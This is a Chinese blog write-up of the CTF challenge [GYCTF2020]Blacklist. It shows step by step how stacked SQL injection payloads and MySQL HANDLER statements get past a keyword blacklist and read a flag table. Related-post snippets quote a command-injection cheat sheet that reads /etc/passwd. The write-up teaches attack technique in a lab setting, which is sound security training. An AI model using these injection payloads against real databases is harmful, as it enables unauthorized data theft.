2020/7/10 - [GYCTF2020]Blacklist - handler绕过sql黑名单

最新推荐文章于 2024-03-17 00:50:39 发布
最新推荐文章于 2024-03-17 00:50:39 发布
阅读量900 收藏
点赞数
分类专栏: CTF 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangxiansheng12/article/details/107247450
版权

文章目录


这个跟[强网杯 2019]随便注这道题有些类似,都是堆叠注入的形式,不同有
1.那个似乎是数字型注入,这个是字符型的注入
2.那个黑名单过滤的少,这个几乎能用的都过滤了

1.先看是什么类型的注入

分别用
1 or 1=1#
1’ or 1=1#
1" or 1=1#
执行测试,返回全部库信息的即是该类型。试一下,发现是单引号字符型注入。

2.测试堆叠注入

使用以下payload测试是否是堆叠注入

1';show databases;#

执行到了,说明就是堆叠注入,下面就是我们依次判断flag在哪里了。
判断表

1';show tables;#

查FlagHere表信息。

1';show columns from FlagHere;#

返回了这个

array(6) {
  [0]=>
  string(4) "flag"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

flag可能就在这个表里面,但是select与set、alter等众多关键词都被黑名单掉了,这里要利用HANDLER

通过HANDLER tbl_name OPEN打开一张表,无返回结果,实际上我们在这里声明了一个名为tb1_name的句柄。

通过HANDLER tbl_name READ FIRST获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。

通过HANDLER tbl_name CLOSE来关闭打开的句柄。

HANDLER的详细使用方法

3.最终payload

1';handler FlagHere open;handler FlagHere read first;Handler FlagHere close;#

获得flag

flag{7a2e4d0f-4bed-460a-99d7-e48fcf1032c4}

学习了学习了。

抒情诗、
关注
专栏目录
laravel-email-domain-blacklist:Laravel软件包来验证电子邮件输入未针对特定域名列入黑名单
05-09
Laravel电子邮件域黑名单 验证未将特定域名列入黑名单的电子邮件输入。用法将blacklist添加到验证规则字符串。 public function store ( Request $ request ) { $ this -> validate ( $ request , [ 'email' => '...
[CTF技巧]命令注入绕过总结
3tefanie丶zhou的博客
07-08 3658
命令分隔符 cat /etc/passwd;ls 分号 ; cmd1;cmd2(多条语句顺序执行) cat /etc/passwd && ls and && cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cat etc || ls or || cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2 管道符 | | 管道符 管道符”|“
sql注入(三)绕过方法及防御手段
m0_63306943的博客
05-02 7881
1)如果 waf 过滤了逗号,并且只能盲注,在取子串的几个函数中,有一个替代逗号的方法就是使用 from for ,其中 pos 代表从 pos 个开始读取 len 长度的子串。rlike 模糊匹配,只要字段的值中存在要查找的 部分 就会被选择出来,用来取代 = 时,rlike 的用法和上面的 like 一样,没有通配符效果和 = 一样。因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的,
BUUCTF[GYCTF2020]Blacklist
weixin_45253622的博客
05-22 325
sql注入题型,测试发现黑名单如下: 大小写,双写,编码均不可绕过。 可用的还有,or and unionshow 输入:1 or 1=1 无反应 输入:1' or '1' ='1如下: 字符型注入,由于show可用,所以我们想到堆叠注入: 1';show tables; 查看字段名, 1';show columns from FlagHere; 过滤机制过于强大,所以我们使用handlerHANDLER...OPEN语句打开一个表,使其可以使用...
安全】P 2-18 绕过剔除黑名单(union和select)的SQL注入
Z_David_Z的博客
02-15 647
目录0X01 基础知识介绍0X02 去除(union)的代码分析0X03 绕过去除(union)的sql的注入0X04 sqlmap安全检测 0X01 基础知识介绍 1、Mysql中的大小写不敏感,大写与小写一样。 2、Mysql 中的十六进制与URL编码通过解码识别。 3、符号和关键字替换 and – &&、or – ||。 4、空格使用 %20表示、%0a换行 %09 tab 0X02 去除(union)的代码分析 preg_replace(mixed $pattern , mixed
[GYCTF2020]Blacklist(堆叠注入)
记录学习,一起进步
01-19 2022
[GYCTF2020]Blacklist(堆叠注入)
express-jwt-blacklist:用于令牌黑名单的express-jwt插件
05-16
表达jwt黑名单 一个库,旨在作为中间件的补充插件。 简单的例子 var express = require ( 'express' ) ; var jwt = require ( 'express-jwt' ) ; var blacklist = require ( 'express-jwt-blacklist' ) ; var app ...
Journal_Blacklist_期刊黑名单_journal-blacklist.zip
最新发布
09-12
Journal_Blacklist_期刊黑名单_journal-blacklist
uBlacklist-blacklist:uBlacklist浏览器扩展的黑名单
02-15
**uBlacklist 黑名单详解** uBlacklist是一款广受欢迎的浏览器扩展,它允许用户自定义规则,屏蔽网络上不想要的内容,如广告、追踪器或者特定的网页元素。这款扩展程序的核心功能就是其黑名单机制,它使得用户可以...
mikrotik-blacklist:建立mikrotik防火墙黑名单
03-06
mikrotik黑名单 生成器mikrotik防火墙黑名单
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2374
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
[GYCTF2020]Blacklist1-BUUCTF-详解
chinese_cabbage0的博客
02-05 1819
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 704
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
安恒11月赛Web题目复现
0verWatch的博客
11-30 2410
考完网络安全跟算法就赶紧来复现一下题目,又学到了一波知识了23333,这次题目的质量贼好 手速要快 上一个月的原题,不多说,直接在http头里面找到对应的password登陆以后直接就是关于页面上传的功能,这里的上传是服务器端的问题 直接上传一个非php结尾的文件即可解析 然后可以直接输入相关命令获取flag不多说 好黑的黑名单 这个题目质量很好,至少我以前都没见过这种盲注,里面利用了bet...
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2660
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
练习8 Web [GYCTF2020]Blacklist
离暑假还有41天的博客
03-17 1212
这道题其实不是堆叠注入,但是我在联合查询无效后,试了一下堆叠,最后一步发现被过滤的sql语句太多了,完全没法。查阅其他wp的过程,是用的handler语句,只能用于MySQL中,是类似于select的语句,详细内容我记录在我的wp中
buuctf[GYCTF2020]Blacklist
qq_75005708的博客
04-25 173
如果使用别名打开表,使用其他 HANDLER 语句对打开的表的进一步引用必须使用别名,而不是表名。如果不使用别名,但使用由数据库名称限定的表名打开表,则进一步的引用必须使用不限定的表名。例如,使用 mydb.mytable 打开的表,进一步引用必须使用 mytable。和输入1的时候是一样的,看了wp之后发现其他的方法,运用HANDLER 语句。open是打开,read是开始读取的意思,close是结束的意思。是有一个1,我们查询之后会发现出现以上页面,我们再试一下1'然后我们就可以拿到我们的答案了。
/etc/modprobe.d/blacklist-nouveau.conf
04-14
`/etc/modprobe.d/blacklist-nouveau.conf`是一个配置文件,用于禁用Linux系统中的nouveau显卡驱动程序。nouveau是一个开源的NVIDIA显卡驱动程序,但在某些情况下可能会导致系统出现问题。通过在`/etc/modprobe.d/blacklist-nouveau.conf`文件中添加相关配置,可以禁用nouveau驱动程序。 以下是一个示例的`/etc/modprobe.d/blacklist-nouveau.conf`文件的内容: ```shell blacklist nouveau options nouveau modeset=0 ``` 上述配置文件中的`blacklist nouveau`行用于禁用nouveau驱动程序,而`options nouveau modeset=0`行用于禁用nouveau的内核模块参数。 请注意,修改`/etc/modprobe.d/blacklist-nouveau.conf`文件需要root权限。修改完成后,您需要重新启动系统以使更改生效。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抒情诗、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值